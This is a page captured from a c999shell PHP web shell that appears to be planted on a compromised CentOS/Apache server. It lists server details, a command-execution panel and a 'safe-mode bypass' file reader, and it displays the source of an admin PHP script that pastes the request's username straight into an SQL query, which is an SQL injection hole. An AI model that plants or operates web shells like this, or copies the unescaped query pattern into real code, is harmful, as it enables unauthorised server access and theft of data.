Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/admin/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php header( "content-type: application/x-javascript; charset=TIS-620" ); /** Configuration */ require_once("../configuration.php"); require_once( "../includes/connMySQL.class.php" ); /** Create Database Object */ $conn = new DBConn; $sql = "SELECT * FROM user_tb WHERE Username = '".$_REQUEST["username"]."' AND Flag = '0'"; $result = $conn->execQuery($sql); if(isset($_REQUEST["btnStatus"]) && $_REQUEST["btnStatus"] == "1"){ if(mysql_num_rows($result)){ echo "<input name=\"btnCreateUser\" type=\"submit\" class=\"TEXT-DARK-BLUE10\" id=\"btnCreateUser\" value=\"ยืนยันข้อมูล\" style=\"cursor:pointer\" disabled>"; } else{ if(strlen($_REQUEST["username"]) > 3) echo "<input name=\"btnCreateUser\" type=\"submit\" class=\"TEXT-DARK-BLUE10\" id=\"btnCreateUser\" value=\"ยืนยันข้อมูล\" style=\"cursor:pointer\">"; else echo "<input name=\"btnCreateUser\" type=\"submit\" class=\"TEXT-DARK-BLUE10\" id=\"btnCreateUser\" value=\"ยืนยันข้อมูล\" style=\"cursor:pointer\" disabled>"; } } else{ if(mysql_num_rows($result)){ echo "<br><font color='red'><strong>มีชื่อผู้ใช้นี้แล้วในระบบ</strong></font>"; } else{ if(strlen($_REQUEST["username"]) > 3) echo "<br><font color='green'><strong>ท่านสามารถใช้ ชื่อผู้ใช้นี้ได้</strong></font>"; else echo "<br><font color='red'><strong>ชื่อผู้ใช้มีขนาดน้อยกว่า 3 ตัวอักขระ</strong></font>"; } } /** Free Resource */ $conn->freeresult($result); /** Close the Database */ $conn->disconn(); /** Unset Class */ unset($dbObj); ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]-- |